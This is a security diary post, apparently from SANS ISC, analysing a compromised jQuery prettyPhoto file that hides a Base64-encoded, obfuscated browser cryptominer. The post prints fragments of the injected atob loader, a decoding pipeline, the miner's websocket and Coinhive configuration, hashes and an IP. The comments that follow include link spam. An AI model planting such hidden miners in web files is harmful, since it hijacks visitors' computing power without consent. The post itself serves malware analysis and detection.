Cryptominer Delivered Though Compromized JavaScript File
Yesterday I found an interesting compromised JavaScript file that contains extra code to perform crypto mining activities. It started with a customer's IDS alerts on the following URL:
hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js
This website is not referenced as malicious and the domain looks clean. When you point your browser to the site, it loads the JavaScript file. So, I performed some investigations on this URL. jquery.prettyphoto.js is a file from the package pretty photo[1] but the one hosted on safeyourhealth[.]ru was modified.
The original one starts like this:
(function($) {
$.prettyPhoto = {version: '3.1.4'};
$.fn.prettyPhoto = function(pp_settings) {
pp_settings = jQuery.extend({
...
The malicious one started like this:
new Function(atob(“dmFyIF8weDQ5ZTY9WydjYW5jZWxlZ...Y5ZignMHgyNycpXSgpOw=="))()
(function($){$.prettyPhoto={version:'3.1.4'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({hook:'rel',animation_speed:'fast',ajaxcallback:function()
...
The file was submitted to VT and received a score of 1/59[2]. atob() is the JavaScript function used to decode Base64. Let’s extract the payload and decode it:
$ curl —socks5 ten:9050 hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js | \
grep atob | \
awk -F ‘“‘ ‘{ print $2 }’ | \
base64 -d >jquery.prettyphoto.js.decoded
$ cat jquery.prettyphoto.js.decoded
var _0x49e6=['canceled','error','opt_in_canceled','_connect','lastPingReceived','getItem','parse','ident','_updateTabs','waitReconnect','dontKillTabUpdate','setItem','stringify','stats','_hashString','charCodeAt','WEBSOCKET_SHARDS','_onMessage','onerror','_onError','onclose','onopen','_onOpen','anonymous','user','toString','type','token','goal','ref','opt_in','_send','_onClose','code','job','enabled','_adjustThreads','hash_accepted','hashes','accepted','authed','Bee\x20Error:','invalid_site_key','invalid_opt_in','reset','banned','_onTargetMet','job_id','submit','nonce','result','_onVerified','send','some_code','ifExclusiveTab','FORCE_EXCLUSIVE_TAB','forceExclusiveTab','forceMultiTab','User','Anonymous','Res','URL','webkitURL','mozURL','createObjectURL','worker','onReady','currentJob','verifyJob','verifyCallback','_isReady','lastMessageTimestamp','ready','Expecting\x20first\x20message\x20to\x20be\x20\x22ready\x22,\x20got\x
...
The script is obfuscated with a very big array (_0x49e6) which contains pieces of strings and code.
You can easily spot the behaviour of the script with the following snippet of code:
var _0x348ae9 = navigator['hardwareConcurrency'] || 4;
The navigator.hardwareConcurrency is a read-only property which returns the number of logical processors available to run threads on the computer. Always interesting for a cryptominer to know how many threads can be started.
If the code was obfuscated, strings were not. More interesting strings are easy to find:
self[_0x169f('0x98')][_0x169f('0x4b')] = {
'LIB_URL': _0x169f('0xb2'),
'ASMJS_NAME': _0x169f('0xb3'),
'REQUIRES_AUTH': ![],
'WEBSOCKET_SHARDS': [['wss://wss.rand.com.ru:8843/']],
'CAPTCHA_URL': 'https://coinhive.com/captcha/',
'MINER_URL': _0x169f('0xb4'),
'AUTH_URL': 'https://authedmine.com/authenticate.html'
};
I wrote a VTI hunting rule to search for scripts containing the string "navigator['hardwareConcurrency']" and I got some hits last night. All of them where submitted for the first time yesterday and got a score of 6/59:
90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
58c2c761ca127e6392f72ac60b7f6cbf20fa52db7e7f94468e1640ee3a132c21
56a2eebc67293799a01fa74a9d206ba336bc6df5c32ae68987d110e9bcd81cc2
90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
7fa97e4b27e8542a0fc330bdd9cadccd1bafa166269a3bf846f7663b9f992be1
835a19b59e1e2aeeb538509022581202756ee13e78b4d1c6592918ec854168bb
ded2b6d76a00a67c60f0488b2d0507334363314552edc31a1fd29fdbebc493f6
d920455b0d5f4783fb0fa3504ac14d540a3835774515cdc26284514ebad83f37
ad453a6563ee5e1c522a4405c57e0740db343ba180981f4da65a19b9b8aaa883
All of them use the same IP address: 148.251.136.203.
I also searched for similar compromized jquery.prettyphoto.js files. This code is used on many websites but I did not find other malicious occurrences. Please share if you find some.
[1] https://github.com/scaron/prettyphoto
[2] https://www.virustotal.com/#/file/977a811695dbbd370e162807e4c0fbc25c9fda8bba3417279c2f8ee1289a47e6/detection
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago